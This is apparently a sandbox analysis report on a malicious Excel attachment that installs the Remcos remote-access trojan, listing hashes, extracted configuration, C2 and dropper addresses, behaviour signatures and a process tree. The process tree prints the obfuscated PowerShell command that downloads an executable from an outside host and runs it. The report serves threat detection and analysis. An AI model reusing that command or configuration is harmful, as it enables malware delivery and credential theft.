Overview

overview

10

Static

static

8

ACH-01068034.xls

windows7_x64

10

ACH-01068034.xls

windows10_x64

10

Analysis

  • max time kernel
    153s
  • max time network
    162s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    14-10-2021 08:11

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ACH-01068034.xls

  • Size

    74KB

  • MD5

    61cad3efd5f03b11b513cf54c6b2122b

  • SHA1

    5b5584f7798f33d6bab0c37755f3fe62672b48f7

  • SHA256

    c0c93f169cabc35bbaac637c0dd6c21112752398c42b3c828d78d9cc4de2eaed

  • SHA512

    56b2e055a0dc3a9ba009a5c46839f8882959c024886f47b1493ba0204b25311b3e4612bf3ef44758231c6297fcd8dc5ca7aba43a347cbd2f7e793abb4a33be31

Score
10/10
remcosremotehostcollectionpersistenceratspywarestealer

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://greenpayindia.com/wp-conternt/ConsoleApp18.exe

Extracted

Family

remcos

Version

3.3.0 Pro

Botnet

RemoteHost

C2

lplazadtemins.duckdns.org:443

Attributes
  • audio_folder

    MicRecords

  • audio_path

    %AppData%

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • install_path

    %AppData%

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • keylog_path

    %AppData%

  • mouse_option

    false

  • mutex

    Remcos-NLSDTO

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    Remcos

  • take_screenshot_option

    false

  • take_screenshot_time

    5

  • take_screenshot_title

    notepad;solitaire;

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • Nirsoft 2 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 4 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
    collection
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious use of SetThreadContext 4 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 15 IoCs
  • Suspicious use of WriteProcessMemory 43 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\ACH-01068034.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:620
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Documents\travelespecially.cmd" "
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:356
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -w hi sleep -Se 31;Start-BitsTransfer -Source htt`p://greenpayindia.com/wp-conternt/ConsoleApp18.e`xe -Destination C:\Users\Public\Documents\brotherneed.e`xe;C:\Users\Public\Documents\brotherneed.e`xe
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1456
        • C:\Users\Public\Documents\brotherneed.exe
          "C:\Users\Public\Documents\brotherneed.exe"
          4⤵
          • Adds Run key to start application
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1672
          • C:\Users\Admin\AppData\Local\Temp\brotherneed.exe
            C:\Users\Admin\AppData\Local\Temp\brotherneed.exe
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:2096
            • C:\Users\Admin\AppData\Local\Temp\brotherneed.exe
              C:\Users\Admin\AppData\Local\Temp\brotherneed.exe /stext "C:\Users\Admin\AppData\Local\Temp\ovvrkyvnjcoalzkksbxdgcmapnzrymln"
              6⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              PID:2876
            • C:\Users\Admin\AppData\Local\Temp\brotherneed.exe
              C:\Users\Admin\AppData\Local\Temp\brotherneed.exe /stext "C:\Users\Admin\AppData\Local\Temp\zpjcl"
              6⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3808
            • C:\Users\Admin\AppData\Local\Temp\brotherneed.exe
              C:\Users\Admin\AppData\Local\Temp\brotherneed.exe /stext "C:\Users\Admin\AppData\Local\Temp\broumjrj"
              6⤵
              • Executes dropped EXE
              • Accesses Microsoft Outlook accounts
              PID:944

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1
T1060

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Credentials in Files

1
T1081

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Lateral Movement

Collection

Data from Local System

1
T1005

Email Collection

1
T1114

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\brotherneed.exe
    MD5

    aade455507f667318c83c42a95b3fc3c

    SHA1

    92efbfe4546ddee6a5807a5794adea2f440cf107

    SHA256

    b774d45c6788cc48716eee3e81002e5b74996a3c2610967f3d19115646ca4d6a

    SHA512

    f3a719f289a06b7bda717c56ddc4319bcd9c5f82eebe815f6923635f630f2940efa5cf8298d94117e0ef2470225deecaf3641e96b63cf47b3767a6aa5a772ffd

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\brotherneed.exe
    MD5

    aade455507f667318c83c42a95b3fc3c

    SHA1

    92efbfe4546ddee6a5807a5794adea2f440cf107

    SHA256

    b774d45c6788cc48716eee3e81002e5b74996a3c2610967f3d19115646ca4d6a

    SHA512

    f3a719f289a06b7bda717c56ddc4319bcd9c5f82eebe815f6923635f630f2940efa5cf8298d94117e0ef2470225deecaf3641e96b63cf47b3767a6aa5a772ffd

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\brotherneed.exe
    MD5

    aade455507f667318c83c42a95b3fc3c

    SHA1

    92efbfe4546ddee6a5807a5794adea2f440cf107

    SHA256

    b774d45c6788cc48716eee3e81002e5b74996a3c2610967f3d19115646ca4d6a

    SHA512

    f3a719f289a06b7bda717c56ddc4319bcd9c5f82eebe815f6923635f630f2940efa5cf8298d94117e0ef2470225deecaf3641e96b63cf47b3767a6aa5a772ffd

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\brotherneed.exe
    MD5

    aade455507f667318c83c42a95b3fc3c

    SHA1

    92efbfe4546ddee6a5807a5794adea2f440cf107

    SHA256

    b774d45c6788cc48716eee3e81002e5b74996a3c2610967f3d19115646ca4d6a

    SHA512

    f3a719f289a06b7bda717c56ddc4319bcd9c5f82eebe815f6923635f630f2940efa5cf8298d94117e0ef2470225deecaf3641e96b63cf47b3767a6aa5a772ffd

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\brotherneed.exe
    MD5

    aade455507f667318c83c42a95b3fc3c

    SHA1

    92efbfe4546ddee6a5807a5794adea2f440cf107

    SHA256

    b774d45c6788cc48716eee3e81002e5b74996a3c2610967f3d19115646ca4d6a

    SHA512

    f3a719f289a06b7bda717c56ddc4319bcd9c5f82eebe815f6923635f630f2940efa5cf8298d94117e0ef2470225deecaf3641e96b63cf47b3767a6aa5a772ffd

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\ovvrkyvnjcoalzkksbxdgcmapnzrymln
    MD5

    97df504bfd2bd5a506e650b791508181

    SHA1

    fcbe623c69e21332ba3b657fb8e08f1a3136479d

    SHA256

    cac37437a8df8dec72c830a034dec8962357a5e41545c8cdd3e3529f3007fb6b

    SHA512

    63d93900a51ccdf51215c57527af84c0f79ffa82f1463c851e6d765f91c1a4be624190b335e46debc8a1c63bc06dec885207c92e4d44a815fdf0d42f8dd6fd81

    Download Submit
  • C:\Users\Public\Documents\travelespecially.cmd
    MD5

    5ea928ce876726d313001f5cbd14bc65

    SHA1

    b259839789c490d08af262d9217eddf2bfa93060

    SHA256

    6c6f74c6249e442097918f128fa0680d53504fabf1f31198ed9c4d5de3364e0f

    SHA512

    f8bceb21b86176edd8a917b000edcf2c6458e175c75ca546933caada1b6f436dd1e0a269c0989b45da5a9b48821bd97bb5db86b122e922fc8ae551b860cd2421

    Download Submit
  • memory/356-264-0x0000000000000000-mapping.dmp
    Download
  • memory/620-121-0x000002245F960000-0x000002245F962000-memory.dmp
    Filesize

    8KB

    Download
  • memory/620-117-0x00007FFF50D30000-0x00007FFF50D40000-memory.dmp
    Filesize

    64KB

    Download
  • memory/620-115-0x00007FFF50D30000-0x00007FFF50D40000-memory.dmp
    Filesize

    64KB

    Download
  • memory/620-116-0x00007FFF50D30000-0x00007FFF50D40000-memory.dmp
    Filesize

    64KB

    Download
  • memory/620-114-0x00007FFF50D30000-0x00007FFF50D40000-memory.dmp
    Filesize

    64KB

    Download
  • memory/620-118-0x00007FFF50D30000-0x00007FFF50D40000-memory.dmp
    Filesize

    64KB

    Download
  • memory/620-119-0x000002245F960000-0x000002245F962000-memory.dmp
    Filesize

    8KB

    Download
  • memory/620-120-0x000002245F960000-0x000002245F962000-memory.dmp
    Filesize

    8KB

    Download
  • memory/944-463-0x0000000000455238-mapping.dmp
    Download
  • memory/944-469-0x0000000000400000-0x0000000000457000-memory.dmp
    Filesize

    348KB

    Download
  • memory/1456-412-0x0000021DAC7E8000-0x0000021DAC7E9000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1456-411-0x0000021DAC7E6000-0x0000021DAC7E8000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1456-291-0x0000021DAC7E3000-0x0000021DAC7E5000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1456-290-0x0000021DAC7E0000-0x0000021DAC7E2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1456-267-0x0000000000000000-mapping.dmp
    Download
  • memory/1672-419-0x0000000004EE0000-0x0000000004EE1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1672-413-0x0000000000000000-mapping.dmp
    Download
  • memory/2096-454-0x0000000000400000-0x0000000000479000-memory.dmp
    Filesize

    484KB

    Download
  • memory/2096-450-0x000000000042FC39-mapping.dmp
    Download
  • memory/2876-456-0x0000000000476274-mapping.dmp
    Download
  • memory/2876-468-0x0000000000400000-0x0000000000478000-memory.dmp
    Filesize

    480KB

    Download
  • memory/3808-459-0x0000000000422206-mapping.dmp
    Download
  • memory/3808-467-0x0000000000400000-0x0000000000424000-memory.dmp
    Filesize

    144KB

    Download